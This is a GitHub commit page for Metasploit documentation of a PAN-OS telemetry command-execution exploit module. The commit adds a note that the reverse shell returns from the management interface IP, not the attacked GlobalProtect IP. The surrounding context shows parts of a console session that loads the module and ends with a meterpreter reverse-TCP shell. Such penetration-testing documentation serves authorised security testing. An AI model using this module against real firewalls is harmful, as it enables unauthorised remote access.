Skip to content

Commit 2ad13ac

Browse files
authored
Added note about shell from a different IP than RHOST IP
1 parent 4f3ee3f commit 2ad13ac

File tree

1 file changed

+3
-1
lines changed

1 file changed

+3
-1
lines changed

documentation/modules/exploit/linux/http/panos_telemetry_cmd_exec.md

Lines changed: 3 additions & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -38,6 +38,8 @@ Note: Ensure the target is vulnerable to unauthenticated file creation with the
3838

3939
Note: Since it can take up to one hour to establish code execution, the listener should be left running for that period.
4040

41+
Note: In the standard PAN-OS configuration, the payload is delivered to the GlobalProtect interface IP, but the shell will return via a different PAN-OS management interface IP.
42+
4143
```
4244
msf6 > use exploit/linux/http/panos_telemetry_cmd_exec
4345
[*] Using configured payload cmd/linux/http/x64/meterpreter_reverse_tcp
@@ -107,4 +109,4 @@ Architecture : x64
107109
BuildTuple : x86_64-linux-musl
108110
Meterpreter : x64/linux
109111
meterpreter >
110-
```
112+
```

0 commit comments

Comments
 (0)